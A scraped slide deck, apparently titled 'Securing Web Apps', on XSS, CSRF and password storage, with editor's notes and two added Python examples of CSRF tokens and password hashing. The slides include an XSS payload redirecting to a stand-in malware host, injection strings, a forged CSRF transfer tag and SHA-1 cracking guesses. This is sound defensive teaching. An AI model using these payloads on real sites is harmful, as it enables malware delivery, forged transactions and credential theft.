Django cryptographyDjango cryptography
Django cryptography
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning Center
 
Owasp & Asp.Net
Owasp & Asp.NetOwasp & Asp.Net
Owasp & Asp.Net
 
Rails Security
Rails SecurityRails Security
Rails Security
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
ruxc0n 2012
ruxc0n 2012ruxc0n 2012
ruxc0n 2012
 
JWTs for CSRF and Microservices
JWTs for CSRF and MicroservicesJWTs for CSRF and Microservices
JWTs for CSRF and Microservices
 

Recently uploaded

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 

Recently uploaded (20)

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx

SECURING WEB APPS

  • 16. Reflective XSS
    • welcome.jsp?name=Bob
    • Welcome Bob!
    • welcome.jsp?name=<blink>Bob</blink>
    • Welcome <blink>Bob</blink>
    • R.I.P. <blink> - Aug. 6, 2013
    • welcome.jsp?name=<script>document.location="evil.server/malware"</script>
    • Welcome <script>document.location="evil.server/malware"</script>!
    • Vulnerable Code: Welcome $name
  • 17. Persistent XSS
    • XSS attack payload is stored
      • Database
      • Session variable
      • Cookie
      • File
      • Image metadata
  • 19. How XSS exploits clients
    • Session hijacking (mitigation: HttpOnly flag on cookies)
    • Malware
    • Stealing Credentials
    • Internal network scanning
    • Data Theft
    • Impersonating Users
    • Bypass CSRF Defenses
    • Key loggers
  • 20. XSS Defenses
    • Contextual Output Encoding
  • 21. Contextual Output Encoding Examples
    Vulnerable Code                        Resulting Output
    <div> INPUT </div>                     <div> <script>alert(1)</script> </div>
    <input value="INPUT">                  <input value="" onfocus="alert(1)">
    <script> var a = "INPUT"; </script>    <script> var a = "" + alert(1) + ""; </script>
  • 22. Contextual Output Encoding Examples
    Encoded Code                                      Resulting Output
    <div> encodeForHtml(INPUT) </div>                 <div> &lt;script&gt;alert(1)&lt;/script&gt; </div>
    <input value="encodeForHtmlAttr(INPUT)">          <input value="&quot;&#x20;onfocus&#x3D;&quot;alert(1)">
    <script> var a = "encodeForJS(INPUT)"; </script>  <script> var a = "\x22\x20\x2b\x20alert\x281\x29\x20\x2b\x20\x22"; </script>
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • 23. XSS Defenses
    • Contextual Output Encoding
      • OWASP Java Encoder Project
      • ESAPI (PHP, Coldfusion, Python)
      • Anti-XSS (.NET)
    • Server side input validation
      • Use a whitelist where possible
    • HTML Sanitizers
      • AntiXSS/HTML Agility Pack (.NET)
      • Java HTML Purifier
      • HTML Purifier/htmLawed (PHP)
      • DOM Purify (JavaScript, NodeJS?)
  • 24. XSS Defenses – continued
    • Understand your framework's defenses
      • @Model.name
      • <a href="javascript&#x3A;alert(1)">Click Me!</a>
    • Use a JavaScript MVC framework that supports templated views
      • <div>{{user.name}}</div>
      • https://code.google.com/p/mustache-security/
    • Content Security Policy
  • 25. Cross Site Request Forgery (CSRF)
  • 26. What is CSRF?
    • "Forced Browsing"
    • my.bank/transfer?amount=1000&to=1234
    • <img src="my.bank/transfer?amount=1000&to=666">
    • 4.5 million Routers Hacked via CSRF
    • Places to be especially aware of
      • Actions
      • Account/Role Management
  • 28. CSRF Defense
    • Eliminate Cross Site Scripting (XSS)
    • Re-enter password
    • GET requests do NOT change server state
    • Synchronizer-token pattern
      1. A random token is generated and associated with the user's session
      2. Include the token in each state-changing request made to the server
      3. The server validates that the submitted token is valid
  • 29. CSRF defenses in action
    • CSRF Token
      • Unique per user session
      • Sent on state-changing requests
    if (tokenInRequest == TokenOnServer)
        Proceed
    else
        Error!
  • 30. Example: ASP.NET MVC
    Controller
    [ValidateAntiForgeryToken]
    public ActionResult DoSomething()
    {
        // Do stuff
    }
    View
    <div>
    @using (Html.BeginForm())
    {
        @Html.AntiForgeryToken()
        // Other form elements
    }
    </div>
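The synchronizer-token pattern from slides 28-30, as an added Python example (not the talk's ASP.NET code): a constructed in-memory Session stands in for the server's session store, and the transfer handler plays the my.bank/transfer endpoint from slide 26.

```python
import hmac
import secrets


class Session:
    """Constructed stand-in for the server-side session store (one per logged-in user)."""

    def __init__(self, balance: int = 5000):
        self.csrf_token = None
        self.balance = balance


def issue_csrf_token(session: Session) -> str:
    """Step 1: generate a random token and associate it with the user's session.
    Issued once per session; call it after login so a pre-login token is never reused."""
    if session.csrf_token is None:
        session.csrf_token = secrets.token_urlsafe(32)
    return session.csrf_token


def render_transfer_form(session: Session) -> str:
    """Step 2: embed the token in every state-changing form, the role
    @Html.AntiForgeryToken() plays in the ASP.NET view on slide 30."""
    token = issue_csrf_token(session)
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="amount"><input name="to"><button>Send</button></form>'
    )


def transfer(session: Session, method: str, form: dict) -> str:
    """Step 3: the server validates the submitted token before changing state.
    GET never changes state, so the <img src="my.bank/transfer?..."> request from
    slide 26 is refused outright; a cross-site POST fails because the attacker's
    page cannot read the token out of the victim's session or form."""
    if method != "POST":
        return "Error! state-changing requests must use POST"
    submitted = form.get("csrf_token", "")
    expected = session.csrf_token or ""
    # Constant-time comparison so the check leaks nothing about the token;
    # an absent or never-issued token can never match.
    if not expected or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return "Error! missing or invalid CSRF token"
    session.balance -= int(form["amount"])
    return f"Proceed: transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    victim = Session()
    print(render_transfer_form(victim))
    # Forged requests: the <img> GET from slide 26, and a cross-site POST without the token.
    print(transfer(victim, "GET", {"amount": "1000", "to": "666"}))
    print(transfer(victim, "POST", {"amount": "1000", "to": "666"}))
    # The user's own form submission carries the session's token.
    print(transfer(victim, "POST", {"amount": "1000", "to": "1234", "csrf_token": victim.csrf_token}))
```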
  • 32. Hashing
    • Potatoes + Frying Pan = Protection!
  • 33. Hashing
    • Potatoes + Frying Pan = Protection!
    • One-way function
    • sha1(password) = 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
    • sha1(salt + password)
      • sha1("A3dyUc" + "password") = e9d435577a819b718fea098a7f4b4b6c9e1963da
      • sha1("8DcPvd" + "password") = aa5f9e6c1f87b3520b08fb1540c3fa62cf2afb03
    • Password + Salt = Sufficient?
  • 34. Password Cracking
    Leaked Hash: 25ab86bed149ca6ca9c1c0d5db7c9a91388ddeab
    Guesses:
    • sha1(password) => 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
    • sha1(123456) => 7c4a8d09ca3762af61e59520943dc26494f8941b
    • sha1(admin) => d033e22ae348aeb5660fc2140aec35850c4da997
    • sha1(monkey) => ab87d24bdc7452e55738deb5f868e1f16dea5ace
    • sha1(s3cr3t) => 25ab86bed149ca6ca9c1c0d5db7c9a91388ddeab (matches the leaked hash)
  • 37. Password Storage in the Real World
    1) Do not limit the type of characters or length of user password
    • Limiting passwords to protect against injection is doomed to failure
    • Be wary of systems that allow unlimited password sizes (Django DOS Sept 2003)
    • One Exception: Password1!
  • 38. Password Storage in the Real World
    2) Use a cryptographically strong credential-specific salt
    • protect( [salt] + [password] );
    • Use a 32char or 64char salt (actual size dependent on protection function)
    • Do not depend on hiding, splitting, or otherwise obscuring the salt
  • 39. Leverage Keyed Functions
    3a) Impose difficult verification on [only] the attacker (strong/fast)
    • HMAC-SHA-256( [private key], [salt] + [password] )
    • Protect this key as any private key using best practices
    • Store the key outside the credential store
    • Build the password-to-hash conversion as a separate web service (cryptographic isolation)
  • 40. Password Storage in the Real World
    3b) Impose difficult verification on the attacker and defender (weak/slow)
    • PBKDF2([salt] + [password], c=10,000,000);
    • Use PBKDF2 when FIPS certification or enterprise support on many platforms is required
    • Use Scrypt where resisting any/all hardware accelerated attacks is necessary but enterprise support and scale is not
  • 41. Closing Thoughts
    • Code with an attacker's perspective
    • Test your app
    • Continue to learn
    • Get Involved
      • OWASP (Open Web Application Security Project)
      • http://utahsec.org

Editor's Notes

  1. Developers? QA? Languages: .NET? Java? PHP? Ruby?
  2. Understand the attacker's perspective when looking at apps. NON-COMPREHENSIVE. Attacker techniques and defenses: how attackers exploit vulnerabilities, and how to defend. Going over vulnerabilities. Why are we just doing these? They're the most common. Offensive spin to everything – my specialty.
  3. Image: http://www.flickr.com/photos/8499561@N02/2755504975/in/photolist-5cuFCt-5cyTFq-5cyVwQ-5PGgWn-5PLzkq-5ZbRfL-63ciQ6-63gz1o-6cJBtc-6cJBVv-6cJCza-6cNK9s-6cNKt7-6cNKzy-6cNKKb-6cNL4h-6dm6RV-6dm7t6-6dm872-6dm98k-6dm9Ex-6dqg2s-6dqhB5-6dCQbG-6e4Mpw-6EZAr6-6GJdwM-6ZqChc-7biTyy-7hbyKu-8mkoo3-8mhcLV-8mh8Mi-8mhe6F-8mkknh-8mhcv6-dxPs8E-8mhi7P-8mkjmb-8mkiqy-8mhfzx-9hXF8W-aMjLPH-9naPe7-cAZHzf-8mhhNn-8mhggX-7Akczu-hxpV6c-91DUz4-gTv7hS
  4. The explanation behind why this specific vector works can be found here: http://bugs.mysql.com/bug.php?id=8652 Each language has multiple queries that can produce the same type of error.
  5. Parameterized queries: encode dangerous characters; bind the data type; performance. Whitelist: a soda machine only allows certain currencies (25 cent, $1, $5); regex (there's Unicode regex if you need international). Blacklist: swear words on TV (you can't say these X number of swear words…).
  6. Why does this produce an error? See http://bugs.mysql.com/bug.php?id=8652 Each language has multiple queries that can produce the same type of error.
  7. You can attack clients without using JavaScript. This is especially useful if a content security policy is being employed by the site. More info:
      http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf
      http://channel9.msdn.com/Events/Blue-Hat-Security-Briefings/BlueHat-Security-Briefings-Fall-2012-Sessions/BH1203
      mXSS: https://cure53.de/fp170.pdf and http://www.slideshare.net/x00mario/the-innerhtml-apocalypse
  8. XSS is a misnomer Likely attack vector – clicking on a link (email, twitter, etc)
  9. XSS payload is stored somewhere (it persists in that location)
  10. Session Hijacking: UbuntuForums (http://blog.canonical.com/2013/07/30/ubuntu-forums-are-back-up-and-a-post-mortem/). Use the HttpOnly flag. Network scanning: http://www.symantec.com/connect/blogs/getting-sassy-xss-part-3-port-scanning
  11. Assuming no browser bugs
  12. Angular, KnockoutJS, Ember. ASP.NET Request Validation Engine – doesn't protect against everything.
  13. Browser makes a request that the user never intended to make. Violates the user's trust in the browser - users trust that their browser won't. Millions of Routers Hacked: https://www.securelist.com/en/blog/208193852/The_tale_of_one_thousand_and_one_DSL_modems
  14. NOT changing state on GET requests
  15. CSRF token will change after I log. Not shown – I also had to enter my password to change my account information. When the server receives the request, it ensures the CSRF token sent in the request matches the CSRF token stored in the user's session variable.
  16. Image: http://www.flickr.com/photos/15927968@N00/8516930548/in/photolist-dYBuJ9-dYvMdH-dYQqVJ-dYQr5s-dYQr97-dYJJtt-dYJJBB-dYQr2o-dYJJ36-dYJJHP-dYvMx2-f7kFK6-fSv6bM-8kMyaw-9Jato9-dAPegg
  17. Image: http://www.flickr.com/photos/19359283@N00/7159593410/in/photolist-bUEMFG-aQGurF-bxSyvP-butMo6-9xujR1-cCv6tj-e4RzEp-byNR9F-bnGkBU-cLB6XW-cRNmTA-boCoax-bme2dx-adL7NK-e4nMCh-e4haGx-gvqpN2-7P4hPV-81r41Z-9LR17J-aieZG1-7K5qkP-dEmk4B-cNdW4Y-dEXPaL-dHAbwF-c8Ng7Y-bz2pyF-dHC88t-dHHxbd-dHC7Li-dHHxx5-cyaxp1-9zjynW-8FzinT-amnSL1-9AVHkB-dRn1Dm-dRbeFG-bC17so-88LVQA-bxunYd-97spQP-dKgkdu-j7ZGxc-d6s1xJ-e9PXZX-d6rRkd-d6rTks-d6rSgJ-d6rUwd
  18. Salt is stored right alongside the password (not secret). Image: http://www.flickr.com/photos/19359283@N00/7159593410/in/photolist-bUEMFG-aQGurF-bxSyvP-butMo6-9xujR1-cCv6tj-e4RzEp-byNR9F-bnGkBU-cLB6XW-cRNmTA-boCoax-bme2dx-adL7NK-e4nMCh-e4haGx-gvqpN2-7P4hPV-81r41Z-9LR17J-aieZG1-7K5qkP-dEmk4B-cNdW4Y-dEXPaL-dHAbwF-c8Ng7Y-bz2pyF-dHC88t-dHHxbd-dHC7Li-dHHxx5-cyaxp1-9zjynW-8FzinT-amnSL1-9AVHkB-dRn1Dm-dRbeFG-bC17so-88LVQA-bxunYd-97spQP-dKgkdu-j7ZGxc-d6s1xJ-e9PXZX-d6rRkd-d6rTks-d6rSgJ-d6rUwd
  19. Can’t reverse hashes, so let’s just guess some
  20. Image and more info: https://hashcat.net/forum/thread-2798.html
  21. Guidance: Do not defeat users' attempts to secure their credentials; do not limit the type of characters or length of user passwords. Some organizations restrict the 1) types of special characters and 2) length of credentials accepted by systems because of their inability to prevent SQL Injection, Cross-site scripting, and analogous command-injection attacks. However, secure password storage mechanisms possess design elements that prevent length, constituency, and even encoding from subverting system security. Do not apply length, character set, or encoding restrictions on the entry or storage of credentials. Continue applying encoding, escaping, masking, outright omission, and other best practices to rendering this information when applicable. - Slide borrowed graciously from Jim Manico
  22. Salts serve two purposes: de-duplicate the protected output of identical credentials, and augment the entropy fed to the protecting function without relying on credential complexity. The second aims to make pre-computed lookup attacks [*2] on an individual credential and time-based attacks on a population intractable. - Slide borrowed graciously from Jim Manico
  23. Use an HSM (Hardware Security Module): the private key is not accessible by running software (there's a hardware separation). Do NOT just use a symmetric cipher like AES!!
      HMACs inherit properties of hash functions including their speed, allowing for near instant verification. Key size imposes intractable size- and/or space-requirements on compromise, even for common credentials (aka password = 'password'). Designers protecting stored credentials with keyed functions:
      - Use a single "site-wide" key;
      - Protect this key as any private key using best practices;
      - Store the key outside the credential store (aka: not in the database);
      - Generate the key using cryptographically-strong pseudo-random data;
      - Do not worry about output block size (i.e. SHA-256 vs. SHA-512).
      Example protect() pseudo-code follows: return [salt] + HMAC-SHA-256([key], [salt] + [credential]);
      Upholding the security improvement over (solely) salted schemes relies on proper key management.
      Design protection/verification for compromise: the frequency and ease with which threats steal protected credentials demands "design for failure". Having detected theft, a credential storage scheme must support continued operation by marking credential data compromised and engaging alternative credential validation workflows as follows:
      Protect the user's account:
      - Invalidate authN 'shortcuts', disallowing login without 2nd factors or secret questions
      - Disallow changes to the account (secret questions, out of band exchange channel setup/selection, etc.)
      Load & use a new protection scheme:
      - Load a new (stronger) protect(credential) function
      - Include version information stored with the protected form
      - Set a 'tainted'/'compromised' bit until the user resets credentials
      - Rotate any keys and/or adjust protection function parameters (iteration count)
      - Increment the scheme version number
      When the user logs in:
      - Validate credentials based on the stored version (old or new); if old, demand a 2nd factor or secret answers
      - Prompt the user for a credential change, apologize, & conduct OOB confirmation
      - Convert stored credentials to the new scheme as users successfully log in
      Supporting the workflow outlined above requires tight integration with authentication frameworks and workflows. http://www.tarsnap.com/scrypt/scrypt.pdf
      Slide borrowed graciously from Jim Manico
  24. Impose intractable verification on [only] the attacker. The function used to protect stored credentials should balance between A) acceptable response time for verification of users' credentials during peak use while B) placing the time required to map <credential> → <protected form> beyond threats' hardware (GPU, FPGA) and technique (dictionary-based, brute force, etc.) capabilities. Two approaches facilitate this, each imperfectly.
      Leverage an adaptive one-way function: adaptive one-way functions compute a one-way (irreversible) transform. Each function allows configuration of a 'work factor'. The underlying mechanisms used to achieve irreversibility and govern work factors (such as time, space, and parallelism) vary between functions and remain unimportant to this discussion. Select:
      - PBKDF2 [*4] when FIPS certification or enterprise support on many platforms is required;
      - Scrypt [*5] where resisting any/all hardware accelerated attacks is necessary but support isn't.
      Example protect() pseudo-code follows: return [salt] + pbkdf2([salt], [credential], c=10000);
      Designers select one-way adaptive functions to implement protect() because these functions can be configured to cost (linearly or exponentially) more than a hash function to execute. Defenders adjust the work factor to keep pace with threats' increasing hardware capabilities. Those implementing adaptive one-way functions must tune work factors so as to impede attackers while providing acceptable user experience and scale. Additionally, adaptive one-way functions do not effectively prevent reversal of common dictionary-based credentials (users with password 'password') regardless of user population size or salt usage.
      Leverage keyed functions: keyed functions, such as HMACs, compute a one-way (irreversible) transform using a private key and a given input. For example, HMACs inherit properties of hash functions including their speed, allowing for near instant verification. http://www.tarsnap.com/scrypt/scrypt.pdf
  25. Test your app - Test it yourself, hire someone, try some tools I only grazed the world of web application security
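Slides 33-40 and Editor's Notes 22-24 in one added Python example (not code from the talk or from Jim Manico's text): a versioned protect()/verify() pair covering salted SHA-1 (slide 33), PBKDF2 (slide 40, note 24) and the keyed HMAC scheme (slide 39, note 23), with the convert-on-login step the notes describe. SITE_KEY, PBKDF2_ITERATIONS, the version numbering and the 'version$salt$digest' record format are assumptions.

```python
import hashlib
import hmac
import os

# Site-wide key for the keyed scheme (slide 39, note 23). Constructed here with
# os.urandom; in production it is generated once and kept outside the credential
# store (HSM or key service), never in the database next to the salts.
SITE_KEY = os.urandom(32)
PBKDF2_ITERATIONS = 10_000   # the notes' c=10000; raise it as attacker hardware improves
CURRENT_VERSION = 3          # assumed scheme numbering, see protect()


def unsalted_sha1(password: str) -> str:
    """The scheme slide 34 cracks by guessing: one SHA-1 per guess, and every
    user with the same password gets the same hash."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def protect(password: str, version: int = CURRENT_VERSION, salt: bytes = None) -> str:
    """Return a record 'version$salt$digest' (assumed format) so verify() knows
    which scheme produced it. The 16-byte random salt is per credential and is
    stored in the clear (note 18: the salt is not a secret).
      v1: sha1(salt + password)                  slide 33, no longer sufficient
      v2: PBKDF2-HMAC-SHA-256(salt, password)    slide 40 / note 24, slow for everyone
      v3: HMAC-SHA-256(SITE_KEY, salt+password)  slide 39 / note 23, slow only for the attacker"""
    if salt is None:
        salt = os.urandom(16)
    pw = password.encode("utf-8")
    if version == 1:
        digest = hashlib.sha1(salt + pw).digest()
    elif version == 2:
        digest = hashlib.pbkdf2_hmac("sha256", pw, salt, PBKDF2_ITERATIONS)
    elif version == 3:
        digest = hmac.new(SITE_KEY, salt + pw, hashlib.sha256).digest()
    else:
        raise ValueError(f"unknown scheme version {version}")
    return f"{version}${salt.hex()}${digest.hex()}"


def verify(password: str, stored: str):
    """Validate against the version recorded with the credential (old or new) and,
    on success, re-protect with the current scheme so legacy records are converted
    as users log in (note 23's 'load & use a new protection scheme' workflow).
    Returns (ok, record_to_store)."""
    version, salt_hex, _ = stored.split("$")
    candidate = protect(password, int(version), bytes.fromhex(salt_hex))
    ok = hmac.compare_digest(candidate.encode(), stored.encode())  # constant time
    if ok and int(version) != CURRENT_VERSION:
        return True, protect(password)   # fresh salt, current scheme
    return ok, stored


if __name__ == "__main__":
    print("sha1(password) =", unsalted_sha1("password"))
    legacy = protect("s3cr3t", version=1)        # a constructed pre-migration record
    ok, record = verify("s3cr3t", legacy)
    print(ok, legacy, "->", record)
```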